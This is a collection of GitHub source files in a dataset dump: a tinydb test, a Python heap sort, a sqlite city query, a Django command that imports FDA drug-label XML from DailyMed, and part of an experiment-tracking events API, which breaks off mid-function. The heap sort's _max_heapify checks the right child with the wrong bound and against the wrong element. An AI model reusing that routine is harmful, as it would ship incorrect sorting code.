[{\"name\": \"John Doe II\"}, {\"name\": \"Another John Doe\"}]\n\n db.remove(name.name == \"John Doe II\")\n assert db.all() == [{\"name\": \"Another John 
Doe\"}]\n","repo_name":"mmdbalkhi/Flask-tinydb","sub_path":"tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"4720622213","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n__author__ = 'zjbao123'\r\n\r\n\r\nclass heap_sort(object):\r\n def _max_heapify(self, alist, i, heap_size=None):\r\n length = len(alist)\r\n if heap_size is None:\r\n heap_size = length\r\n l = 2 * i + 1\r\n r = 2 * i + 2\r\n largest = i\r\n if l < heap_size and alist[l] > alist[i]:\r\n largest = l\r\n if l < heap_size and alist[r] > alist[i]:\r\n largest = r\r\n if largest != i:\r\n alist[i], alist[largest] = alist[largest], alist[i]\r\n self._max_heapify(alist, largest, heap_size)\r\n\r\n def _build_max_heap(self, alist):\r\n root_end = int(len(alist) / 2)\r\n for i in range(root_end-1,-1,-1):\r\n self._max_heapify(alist,i)\r\n\r\n def __call__(self, sort_list):\r\n self._build_max_heap(sort_list)\r\n heap_size = len(sort_list)\r\n for i in range(len(sort_list)-1,0,-1):\r\n sort_list[0],sort_list[i]=sort_list[i],sort_list[0]\r\n heap_size -=1\r\n self._max_heapify(sort_list, 0, heap_size)\r\n return sort_list\r\n","repo_name":"zjbao123/learn_python_demo","sub_path":"python27/algorithm/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33607227482","text":"import sqlite3\n\n\ndef get_cities():\n conn = sqlite3.connect('cities.db')\n c = conn.cursor()\n\n cities = []\n for row in c.execute(\"SELECT name, state FROM city ORDER BY state, name\"):\n cities.append({\n \"city\": row[0],\n \"state\": row[1]\n })\n\n return cities","repo_name":"alfredoheights/sunrisesunset","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2059736083","text":"from bs4 import BeautifulSoup\nfrom contextlib import closing\nfrom datetime import datetime, timedelta\nimport logging\nimport re\nimport shutil\nimport urllib.request as request\nimport os\nfrom zipfile import ZipFile\nfrom distutils.util import strtobool\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nfrom django.db.utils import IntegrityError, OperationalError\n\nfrom data.models import DrugLabel, LabelProduct, ProductSection\nfrom users.models import MyLabel\nfrom data.constants import FDA_SECTION_NAME_MAP\n\nlogger = logging.getLogger(__name__)\n\n# python manage.py load_fda_data --type test --cleanup False --insert False --count_titles True\n# python manage.py load_fda_data --type my_label --my_label_id 9 --cleanup False --insert False\n# runs with `python manage.py load_fda_data --type {type}`\nclass Command(BaseCommand):\n help = \"Loads data from FDA\"\n re_combine_whitespace = re.compile(r\"\\s+\")\n re_remove_nonalpha_characters = re.compile(\"[^a-zA-Z ]\")\n\n def __init__(self, stdout=None, stderr=None, no_color=False, force_color=False):\n root_logger = logging.getLogger(\"\")\n root_logger.setLevel(logging.INFO)\n\n self.root_dir = settings.MEDIA_ROOT / \"fda\"\n os.makedirs(self.root_dir, exist_ok=True)\n super().__init__(stdout, stderr, no_color, force_color)\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--type\", type=str, help=\"full, monthly, test or 
my_label\", default=\"monthly\"\n )\n parser.add_argument(\n \"--insert\", type=strtobool, help=\"Set to connect to DB\", default=True\n )\n parser.add_argument(\n \"--cleanup\", type=strtobool, help=\"Set to cleanup files\", default=False\n )\n parser.add_argument(\n \"--my_label_id\", type=int, help=\"set my_label_id for --type my_label\", default=None\n )\n parser.add_argument(\n \"--count_titles\", type=strtobool, help=\"output counts of the section_names\", default=False\n )\n\n \"\"\"\n Entry point into class from command line\n \"\"\"\n\n def handle(self, *args, **options):\n import_type = options[\"type\"]\n insert = options[\"insert\"]\n cleanup = options[\"cleanup\"]\n my_label_id = options[\"my_label_id\"]\n count_titles = options[\"count_titles\"]\n logger.debug(f\"options: {options}\")\n\n # my_label type already has the xml uploaded/downloaded\n if import_type == \"my_label\":\n record_zips = []\n xml_files = []\n else:\n root_zips = self.download_records(import_type)\n record_zips = self.extract_prescription_zips(root_zips)\n xml_files = self.extract_xmls(record_zips)\n\n if count_titles:\n self.count_titles(xml_files)\n\n self.import_records(xml_files, insert, my_label_id)\n\n if cleanup:\n self.cleanup(record_zips)\n self.cleanup(xml_files)\n\n logger.info(\"DONE\")\n\n # Test function for data exploration\n def get_names(self, xml_files):\n unapproved_count = 0\n exception_count = 0\n total_count = 0\n for xml_file in xml_files:\n total_count += 1\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n product_name = \"\"\n generic_name = \"\"\n try:\n product_name = content.find(\"subject\").find(\"name\").text.upper()\n generic_name = content.find(\"genericmedicine\").find(\"name\").text\n unapproved_bool = False\n approval = content.find(\"approval\")\n if approval is not None:\n for code in approval.find_all(\"code\"):\n if \"unapproved\" in code.get(\"displayname\", \"\").lower():\n unapproved_bool = True\n except Exception as e:\n print(e)\n exception_count +=1\n if unapproved_bool:\n unapproved_count += 1\n print(f\"{product_name:50}\\t{generic_name:50}\\t{str(xml_file).split('/')[-1]}\")\n if total_count % 100 == 0:\n print(f\"{unapproved_count}:{len(xml_files)}\\t{exception_count}\")\n\n print(f\"{unapproved_count}:{len(xml_files)}\\t{exception_count}\")\n\n def download_records(self, import_type):\n logger.info(\"Downloading bulk archives.\")\n file_dir = self.root_dir / import_type\n os.makedirs(file_dir, exist_ok=True)\n records = []\n\n if import_type == \"full\":\n for i in range(1, 5):\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_release_human_rx_part{i}.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n elif import_type == \"monthly\":\n now = datetime.now()\n prev_month_lastday = now.replace(day=1) - timedelta(days=1)\n month, year = (\n prev_month_lastday.strftime(\"%b\").lower(),\n prev_month_lastday.year,\n )\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_monthly_update_{month}{year}.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n elif import_type == \"test\":\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_daily_update_10262021.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n archive_url = f\"ftp://public.nlm.nih.gov/nlmdata/.dailymed/dm_spl_daily_update_10182021.zip\"\n records.append(self.download_single_zip(archive_url, file_dir))\n else:\n raise CommandError(\"Type must be one of 'full', 
'monthly', or 'test'\")\n\n return records\n\n def download_single_zip(self, ftp, dest):\n url_filename = ftp.split(\"/\")[-1]\n file_path = dest / url_filename\n\n if os.path.exists(file_path):\n logger.info(f\"File already exists: {file_path}. Skipping.\")\n return file_path\n\n # Download the drug labels archive file\n with closing(request.urlopen(ftp)) as r:\n with open(file_path, \"wb\") as f:\n logger.info(f\"Downloading {ftp} to {file_path}\")\n shutil.copyfileobj(r, f)\n return file_path\n\n \"\"\"\n Daily Med will package it's bulk and monthly into groups of zips. This step is neccesary to\n extract individual drug label zips from the bulk archive.\n \"\"\"\n\n def extract_prescription_zips(self, zips):\n logger.info(\"Extracting prescription Archives\")\n file_dir = self.root_dir / \"record_zips\"\n os.makedirs(file_dir, exist_ok=True)\n record_zips = []\n\n for zip_file in zips:\n with ZipFile(zip_file, \"r\") as zip_file_object:\n for file_info in zip_file_object.infolist():\n if file_info.filename.startswith(\n \"prescription\"\n ) and file_info.filename.endswith(\".zip\"):\n outfile = file_dir / os.path.basename(file_info.filename)\n file_info.filename = os.path.basename(file_info.filename)\n if os.path.exists(outfile):\n logger.info(\n f\"Record Zip already exists: {outfile}. Skipping.\"\n )\n else:\n logger.info(f\"Creating Record Zip {outfile}\")\n zip_file_object.extract(file_info, file_dir)\n record_zips.append(outfile)\n return record_zips\n\n def extract_xmls(self, zips):\n logger.info(\"Extracting XMLs\")\n file_dir = self.root_dir / \"xmls\"\n os.makedirs(file_dir, exist_ok=True)\n xml_files = []\n\n for zip_file in zips:\n with ZipFile(zip_file, \"r\") as zip_file_object:\n for file in zip_file_object.namelist():\n if file.endswith(\".xml\"):\n outfile = file_dir / file\n if os.path.exists(outfile):\n logger.info(f\"XML already exists: {outfile}. 
Skipping.\")\n else:\n logger.info(f\"Creating XML {outfile}\")\n zip_file_object.extract(file, file_dir)\n xml_files.append(outfile)\n return xml_files\n\n def count_titles(self, xml_records):\n titles = []\n for xml_file in xml_records:\n try:\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n\n for section in content.find_all(\"component\"):\n # the structuredbody component is the parent that contains everything, skip it\n structured_body = section.find_next(\"structuredbody\")\n if structured_body is not None:\n logger.debug(f\"SKIPPING: structuredbody\")\n continue\n\n code = section.find(\n \"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.1\"}\n )\n if code is None:\n continue\n title = str(code.get(\"displayname\")).upper()\n if title == \"SPL UNCLASSIFIED SECTION\":\n try:\n title = code.find_next_sibling().get_text(strip=True)\n logger.debug(f\"UNCLASSIFIED title: {title}\")\n except AttributeError:\n pass\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n title = self.re_remove_nonalpha_characters.sub(\"\", title)\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n\n titles.append(title)\n except Exception as e:\n logger.error(\"Error\")\n raise e\n\n import collections\n\n counter = collections.Counter(titles)\n logger.info(counter.most_common(10))\n import csv\n\n with open(\"top_displaynames.csv\", \"w\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow([\"displayname\", \"count\"])\n csvwriter.writerows(counter.most_common(3000))\n\n def import_records(self, xml_records, insert, my_label_id):\n logger.info(\"Building Drug Label DB records from XMLs\")\n\n if len(xml_records) == 0 and my_label_id is not None:\n logger.info(f\"processing my_label_id: {my_label_id}\")\n ml = MyLabel.objects.filter(pk=my_label_id).get()\n xml_file = ml.file.path\n dl = ml.drug_label\n self.process_xml_file(xml_file, insert, dl, my_label_id)\n # TODO better way to know if the process_xml_file was successful\n ml.is_successfully_parsed = True\n ml.save()\n else:\n for xml_file in xml_records:\n try:\n dl = DrugLabel()\n self.process_xml_file(xml_file, insert, dl, my_label_id)\n except Exception as e:\n logger.error(f\"Could not parse {xml_file}\")\n logger.error(str(e))\n continue\n\n\n def process_xml_file(self, xml_file, insert, dl, my_label_id=None):\n logger.debug(f\"insert: {insert}\")\n with open(xml_file) as f:\n content = BeautifulSoup(f.read(), \"lxml\")\n\n # Skip unapproved drug labels\n if self.check_if_unapproved(content):\n logger.info(f\"Skipping {xml_file} because it is not approved\")\n return\n\n dl.source = \"FDA\"\n dl.product_name = content.find(\"subject\").find(\"name\").text.title()\n try:\n generic_name = content.find(\"genericmedicine\").find(\"name\").text\n except AttributeError:\n # don't insert record if we cannot find this\n logger.error(\"unable to find generic_name\")\n return\n dl.generic_name = generic_name[:255].title()\n\n try:\n dl.version_date = datetime.strptime(\n content.find(\"effectivetime\").get(\"value\"), \"%Y%m%d\"\n )\n except ValueError:\n dl.version_date = datetime.now()\n\n try:\n dl.marketer = content.find(\"author\").find(\"name\").text.title()\n except AttributeError:\n dl.marketer = \"\"\n\n # Ensure always selecting the same ndc code if multiple\n ndc_codes = [ndc_code.get(\"code\") for ndc_code in content.find_all(\"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.69\"})]\n dl.source_product_number = sorted(ndc_codes)[0]\n \n \n if my_label_id is not None:\n 
dl.source_product_number = f\"my_label_{my_label_id}\" + dl.source_product_number\n\n # texts = [p.text for p in content.find_all(\"paragraph\")]\n # dl.raw_text = \"\\n\".join(texts)\n dl.raw_text = \"\"\n\n lp = LabelProduct(drug_label=dl)\n\n root = content.find(\"setid\").get(\"root\")\n dl.link = f\"https://dailymed.nlm.nih.gov/dailymed/drugInfo.cfm?setid={root}\"\n\n try:\n if insert:\n dl.save()\n logger.info(f\"Saving new drug label: {dl}\")\n except IntegrityError as e:\n logger.error(str(e))\n return\n\n try:\n if insert:\n lp.save()\n logger.info(f\"Saving new label product\")\n except IntegrityError as e:\n logger.error(str(e))\n return\n\n # In the following section we will build the different sections. We do this by matching XML components\n # to predetermined FDA_SECTION_NAMES, and for components that do not match, we add them to an \"OTHER\"\n # category\n section_map = {}\n for section in content.find_all(\"component\"):\n # the structuredbody component is the parent that contains everything, skip it\n structured_body = section.find_next(\"structuredbody\")\n if structured_body is not None:\n logger.debug(f\"SKIPPING: structuredbody\")\n continue\n logger.debug(f\"section: {repr(section)}\")\n\n code = section.find(\n \"code\", attrs={\"codesystem\": \"2.16.840.1.113883.6.1\"}\n )\n if code is None:\n continue\n\n title = str(code.get(\"displayname\")).upper()\n logger.debug(f\"title: {title}\")\n\n if title == \"SPL UNCLASSIFIED SECTION\":\n try:\n title = code.find_next_sibling().get_text(strip=True)\n logger.debug(f\"UNCLASSIFIED title: {title}\")\n except AttributeError:\n pass\n\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n title = self.re_remove_nonalpha_characters.sub(\"\", title)\n title = self.re_combine_whitespace.sub(\" \", title).strip()\n\n if title not in FDA_SECTION_NAME_MAP.keys():\n section_name = \"OTHER\"\n else:\n section_name = FDA_SECTION_NAME_MAP[title]\n\n # Now that we have determined the section, grab all the text in the component and add it as the\n # value to a corresponding hashmap. If a value already exists, add it to the end\n raw_section_texts = [str(p) for p in section.find_all(\"text\")]\n section_texts = \"\\n\\n
    \".join(raw_section_texts)\n logger.debug(f\"section_texts: {section_texts}\")\n\n # Save other titles in section text\n if section_name == \"OTHER\":\n section_texts = title + \"
    \" + section_texts\n\n # Save to keyed section of map, concatenating repeat sections\n if section_map.get(section_name) is None:\n section_map[section_name] = section_texts\n else:\n if section_name != \"OTHER\":\n logger.debug(\n f\"Found another section: {section_name}\\twith title\\t{title}\"\n )\n section_map[section_name] = (\n section_map[section_name]\n + f\"
    {title}
    \"\n + section_texts\n )\n\n # Now that the sections have been parsed, save them\n for section_name, section_text in section_map.items():\n ps = ProductSection(\n label_product=lp,\n section_name=section_name.title(),\n section_text=section_text,\n )\n try:\n if insert:\n ps.save()\n logger.debug(f\"Saving new product section {ps}\")\n except IntegrityError as e:\n logger.error(str(e))\n except OperationalError as e:\n logger.error(str(e))\n\n def check_if_unapproved(self, content):\n try:\n approval = content.find(\"approval\")\n if approval is not None:\n for code in approval.find_all(\"code\"):\n if \"unapproved\" in code.get(\"displayname\", \"\").lower():\n return True # It is unapproved\n except Exception as e:\n logger.warning(e)\n return False # Otherwise assume it is approved\n\n def cleanup(self, files):\n for file in files:\n logger.debug(f\"remove: {file}\")\n os.remove(file)\n","repo_name":"DrugLabelExplorer/dle","sub_path":"dle/data/management/commands/load_fda_data.py","file_name":"load_fda_data.py","file_ext":"py","file_size_in_byte":18203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30570101986","text":"import itertools\nimport math\nfrom collections import defaultdict\nfrom operator import itemgetter\nfrom typing import Sequence, Optional, Union, Tuple, Mapping\n\nimport attr\nimport jsonmodels.fields\nfrom boltons.iterutils import bucketize\n\nfrom apiserver.apierrors import errors\nfrom apiserver.apimodels.events import (\n MultiTaskScalarMetricsIterHistogramRequest,\n ScalarMetricsIterHistogramRequest,\n MetricEventsRequest,\n MetricEventsResponse,\n MetricEvents,\n IterationEvents,\n TaskMetricsRequest,\n LogEventsRequest,\n LogOrderEnum,\n NextHistorySampleRequest,\n MetricVariants as ApiMetrics,\n TaskPlotsRequest,\n TaskEventsRequest,\n ScalarMetricsIterRawRequest,\n ClearScrollRequest,\n ClearTaskLogRequest,\n SingleValueMetricsRequest,\n GetVariantSampleRequest,\n GetMetricSamplesRequest,\n TaskMetric,\n MultiTaskPlotsRequest,\n)\nfrom apiserver.bll.event import EventBLL\nfrom apiserver.bll.event.event_common import EventType, MetricVariants, TaskCompanies\nfrom apiserver.bll.event.events_iterator import Scroll\nfrom apiserver.bll.event.scalar_key import ScalarKeyEnum, ScalarKey\nfrom apiserver.bll.model import ModelBLL\nfrom apiserver.bll.task import TaskBLL\nfrom apiserver.config_repo import config\nfrom apiserver.database.model.model import Model\nfrom apiserver.database.model.task.task import Task\nfrom apiserver.service_repo import APICall, endpoint\nfrom apiserver.utilities import json, extract_properties_to_lists\n\ntask_bll = TaskBLL()\nevent_bll = EventBLL()\nmodel_bll = ModelBLL()\n\n\ndef _assert_task_or_model_exists(\n company_id: str, task_ids: Union[str, Sequence[str]], model_events: bool\n) -> Union[Sequence[Model], Sequence[Task]]:\n if model_events:\n return model_bll.assert_exists(\n company_id,\n task_ids,\n allow_public=True,\n only=(\"id\", \"name\", \"company\", \"company_origin\"),\n )\n\n return task_bll.assert_exists(\n company_id,\n task_ids,\n allow_public=True,\n only=(\"id\", \"name\", \"company\", \"company_origin\"),\n )\n\n\n@endpoint(\"events.add\")\ndef add(call: APICall, company_id, _):\n data = call.data.copy()\n added, err_count, err_info = event_bll.add_events(company_id, [data], call.worker)\n call.result.data = dict(added=added, errors=err_count, errors_info=err_info)\n\n\n@endpoint(\"events.add_batch\")\ndef add_batch(call: APICall, company_id, _):\n 
events = call.batched_data\n if events is None or len(events) == 0:\n raise errors.bad_request.BatchContainsNoItems()\n\n added, err_count, err_info = event_bll.add_events(\n company_id,\n events,\n call.worker,\n )\n call.result.data = dict(added=added, errors=err_count, errors_info=err_info)\n\n\n@endpoint(\"events.get_task_log\", required_fields=[\"task\"])\ndef get_task_log_v1_5(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n order = call.data.get(\"order\") or \"desc\"\n scroll_id = call.data.get(\"scroll_id\")\n batch_size = int(call.data.get(\"batch_size\") or 500)\n events, scroll_id, total_events = event_bll.scroll_task_events(\n task.get_index_company(),\n task_id,\n order,\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n call.result.data = dict(\n events=events, returned=len(events), total=total_events, scroll_id=scroll_id\n )\n\n\n@endpoint(\"events.get_task_log\", min_version=\"1.7\", required_fields=[\"task\"])\ndef get_task_log_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n order = call.data.get(\"order\") or \"desc\"\n from_ = call.data.get(\"from\") or \"head\"\n scroll_id = call.data.get(\"scroll_id\")\n batch_size = int(call.data.get(\"batch_size\") or 500)\n\n scroll_order = \"asc\" if (from_ == \"head\") else \"desc\"\n\n events, scroll_id, total_events = event_bll.scroll_task_events(\n company_id=task.get_index_company(),\n task_id=task_id,\n order=scroll_order,\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n\n if scroll_order != order:\n events = events[::-1]\n\n call.result.data = dict(\n events=events, returned=len(events), total=total_events, scroll_id=scroll_id\n )\n\n\n@endpoint(\"events.get_task_log\", min_version=\"2.9\", request_data_model=LogEventsRequest)\ndef get_task_log(call, company_id, request: LogEventsRequest):\n task_id = request.task\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n res = event_bll.events_iterator.get_task_events(\n event_type=EventType.task_log,\n company_id=task.get_index_company(),\n task_id=task_id,\n batch_size=request.batch_size,\n navigate_earlier=request.navigate_earlier,\n from_timestamp=request.from_timestamp,\n )\n\n if request.order and (\n (request.navigate_earlier and request.order == LogOrderEnum.asc)\n or (not request.navigate_earlier and request.order == LogOrderEnum.desc)\n ):\n res.events.reverse()\n\n call.result.data = dict(\n events=res.events, returned=len(res.events), total=res.total_events\n )\n\n\n@endpoint(\"events.download_task_log\", required_fields=[\"task\"])\ndef download_task_log(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n\n line_type = call.data.get(\"line_type\", \"json\").lower()\n line_format = str(call.data.get(\"line_format\", \"{asctime} {worker} {level} {msg}\"))\n\n is_json = line_type == \"json\"\n if not is_json:\n if not line_format:\n raise errors.bad_request.MissingRequiredFields(\n \"line_format is required for plain text lines\"\n )\n\n # validate line format placeholders\n valid_task_log_fields = {\"asctime\", \"timestamp\", \"level\", 
\"worker\", \"msg\"}\n\n invalid_placeholders = set()\n while True:\n try:\n line_format.format(\n **dict.fromkeys(valid_task_log_fields | invalid_placeholders)\n )\n break\n except KeyError as e:\n invalid_placeholders.add(e.args[0])\n except Exception as e:\n raise errors.bad_request.FieldsValueError(\n \"invalid line format\", error=e.args[0]\n )\n\n if invalid_placeholders:\n raise errors.bad_request.FieldsValueError(\n \"undefined placeholders in line format\",\n placeholders=invalid_placeholders,\n )\n\n # make sure line_format has a trailing newline\n line_format = line_format.rstrip(\"\\n\") + \"\\n\"\n\n def generate():\n scroll_id = None\n batch_size = 1000\n while True:\n log_events, scroll_id, _ = event_bll.scroll_task_events(\n task.get_index_company(),\n task_id,\n order=\"asc\",\n event_type=EventType.task_log,\n batch_size=batch_size,\n scroll_id=scroll_id,\n )\n if not log_events:\n break\n for ev in log_events:\n ev[\"asctime\"] = ev.pop(\"timestamp\")\n if is_json:\n ev.pop(\"type\")\n ev.pop(\"task\")\n yield json.dumps(ev) + \"\\n\"\n else:\n try:\n yield line_format.format(**ev)\n except KeyError as ex:\n raise errors.bad_request.FieldsValueError(\n \"undefined placeholders in line format\",\n placeholders=[str(ex)],\n )\n\n if len(log_events) < batch_size:\n break\n\n call.result.filename = \"task_%s.log\" % task_id\n call.result.content_type = \"text/plain\"\n call.result.raw_data = generate()\n\n\n@endpoint(\"events.get_vector_metrics_and_variants\", required_fields=[\"task\"])\ndef get_vector_metrics_and_variants(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n call.result.data = dict(\n metrics=event_bll.get_metrics_and_variants(\n task_or_model.get_index_company(), task_id, EventType.metrics_vector\n )\n )\n\n\n@endpoint(\"events.get_scalar_metrics_and_variants\", required_fields=[\"task\"])\ndef get_scalar_metrics_and_variants(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n call.result.data = dict(\n metrics=event_bll.get_metrics_and_variants(\n task_or_model.get_index_company(), task_id, EventType.metrics_scalar\n )\n )\n\n\n# todo: !!! currently returning 10,000 records. 
should decide on a better way to control it\n@endpoint(\n \"events.vector_metrics_iter_histogram\",\n required_fields=[\"task\", \"metric\", \"variant\"],\n)\ndef vector_metrics_iter_histogram(call, company_id, _):\n task_id = call.data[\"task\"]\n model_events = call.data[\"model_events\"]\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n metric = call.data[\"metric\"]\n variant = call.data[\"variant\"]\n iterations, vectors = event_bll.get_vector_metrics_per_iter(\n task_or_model.get_index_company(), task_id, metric, variant\n )\n call.result.data = dict(\n metric=metric, variant=variant, vectors=vectors, iterations=iterations\n )\n\n\nclass GetTaskEventsScroll(Scroll):\n from_key_value = jsonmodels.fields.StringField()\n total = jsonmodels.fields.IntField()\n request: TaskEventsRequest = jsonmodels.fields.EmbeddedField(TaskEventsRequest)\n\n\ndef make_response(\n total: int, returned: int = 0, scroll_id: str = None, **kwargs\n) -> dict:\n return {\n \"returned\": returned,\n \"total\": total,\n \"scroll_id\": scroll_id,\n **kwargs,\n }\n\n\n@endpoint(\"events.get_task_events\", request_data_model=TaskEventsRequest)\ndef get_task_events(_, company_id, request: TaskEventsRequest):\n task_id = request.task\n task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=request.model_events,\n )[0]\n\n key = ScalarKeyEnum.iter\n scalar_key = ScalarKey.resolve(key)\n\n if not request.scroll_id:\n from_key_value = None if (request.order == LogOrderEnum.desc) else 0\n total = None\n else:\n try:\n scroll = GetTaskEventsScroll.from_scroll_id(request.scroll_id)\n except ValueError:\n raise errors.bad_request.InvalidScrollId(scroll_id=request.scroll_id)\n\n if scroll.from_key_value is None:\n return make_response(\n scroll_id=request.scroll_id, total=scroll.total, events=[]\n )\n\n from_key_value = scalar_key.cast_value(scroll.from_key_value)\n total = scroll.total\n\n scroll.request.batch_size = request.batch_size or scroll.request.batch_size\n request = scroll.request\n\n navigate_earlier = request.order == LogOrderEnum.desc\n metric_variants = _get_metric_variants_from_request(request.metrics)\n\n if request.count_total and total is None:\n total = event_bll.events_iterator.count_task_events(\n event_type=request.event_type,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n metric_variants=metric_variants,\n )\n\n batch_size = min(\n request.batch_size,\n int(\n config.get(\"services.events.events_retrieval.max_raw_scalars_size\", 10_000)\n ),\n )\n\n res = event_bll.events_iterator.get_task_events(\n event_type=request.event_type,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n batch_size=batch_size,\n key=ScalarKeyEnum.iter,\n navigate_earlier=navigate_earlier,\n from_key_value=from_key_value,\n metric_variants=metric_variants,\n )\n\n scroll = GetTaskEventsScroll(\n from_key_value=str(res.events[-1][scalar_key.field]) if res.events else None,\n total=total,\n request=request,\n )\n\n return make_response(\n returned=len(res.events),\n total=total,\n scroll_id=scroll.get_scroll_id(),\n events=res.events,\n )\n\n\n@endpoint(\"events.get_scalar_metric_data\", required_fields=[\"task\", \"metric\"])\ndef get_scalar_metric_data(call, company_id, _):\n task_id = call.data[\"task\"]\n metric = call.data[\"metric\"]\n scroll_id = call.data.get(\"scroll_id\")\n no_scroll = call.data.get(\"no_scroll\", False)\n model_events = call.data.get(\"model_events\", False)\n\n 
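# (reviewer note, not in the original source) a minimal client call, assuming the\n    # task reported a scalar metric named \"loss\":\n    #   events.get_scalar_metric_data {\"task\": \"<task_id>\", \"metric\": \"loss\", \"no_scroll\": true}\n    # no_scroll=True asks the backend not to keep a scroll context alive, which is\n    # cheaper when only the first page of results is needed.\n    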
task_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n result = event_bll.get_task_events(\n task_or_model.get_index_company(),\n task_id,\n event_type=EventType.metrics_scalar,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n metrics={metric: []},\n scroll_id=scroll_id,\n no_scroll=no_scroll,\n )\n\n call.result.data = dict(\n events=result.events,\n returned=len(result.events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\"events.get_task_latest_scalar_values\", required_fields=[\"task\"])\ndef get_task_latest_scalar_values(call, company_id, _):\n task_id = call.data[\"task\"]\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n index_company = task.get_index_company()\n metrics, last_timestamp = event_bll.get_task_latest_scalar_values(\n index_company, task_id\n )\n last_iters = event_bll.get_last_iters(\n company_id=index_company, event_type=EventType.all, task_id=task_id, iters=1\n ).get(task_id)\n call.result.data = dict(\n metrics=metrics,\n last_iter=last_iters[0] if last_iters else 0,\n name=task.name,\n status=task.status,\n last_timestamp=last_timestamp,\n )\n\n\n# todo: should not repeat iter (x-axis) for each metric/variant, JS client should get raw data and fill gaps if needed\n@endpoint(\n \"events.scalar_metrics_iter_histogram\",\n request_data_model=ScalarMetricsIterHistogramRequest,\n)\ndef scalar_metrics_iter_histogram(\n call, company_id, request: ScalarMetricsIterHistogramRequest\n):\n task_or_model = _assert_task_or_model_exists(\n company_id, request.task, model_events=request.model_events\n )[0]\n metrics = event_bll.metrics.get_scalar_metrics_average_per_iter(\n company_id=task_or_model.get_index_company(),\n task_id=request.task,\n samples=request.samples,\n key=request.key,\n metric_variants=_get_metric_variants_from_request(request.metrics),\n )\n call.result.data = metrics\n\n\ndef _get_task_or_model_index_companies(\n company_id: str,\n task_ids: Sequence[str],\n model_events=False,\n) -> TaskCompanies:\n \"\"\"\n Returns lists of tasks grouped by company\n \"\"\"\n tasks_or_models = _assert_task_or_model_exists(\n company_id,\n task_ids,\n model_events=model_events,\n )\n\n unique_ids = set(task_ids)\n if len(tasks_or_models) < len(unique_ids):\n invalid = tuple(unique_ids - {t.id for t in tasks_or_models})\n error_cls = (\n errors.bad_request.InvalidModelId\n if model_events\n else errors.bad_request.InvalidTaskId\n )\n raise error_cls(company=company_id, ids=invalid)\n\n return bucketize(tasks_or_models, key=lambda t: t.get_index_company())\n\n\n@endpoint(\n \"events.multi_task_scalar_metrics_iter_histogram\",\n request_data_model=MultiTaskScalarMetricsIterHistogramRequest,\n)\ndef multi_task_scalar_metrics_iter_histogram(\n call, company_id, request: MultiTaskScalarMetricsIterHistogramRequest\n):\n task_ids = request.tasks\n if isinstance(task_ids, str):\n task_ids = [s.strip() for s in task_ids.split(\",\")]\n\n call.result.data = dict(\n metrics=event_bll.metrics.compare_scalar_metrics_average_per_iter(\n companies=_get_task_or_model_index_companies(\n company_id, task_ids, request.model_events\n ),\n samples=request.samples,\n key=request.key,\n )\n )\n\n\ndef _get_single_value_metrics_response(\n companies: TaskCompanies, value_metrics: Mapping[str, dict]\n) -> Sequence[dict]:\n task_names = {\n task.id: task.name for task in itertools.chain.from_iterable(companies.values())\n }\n return [\n 
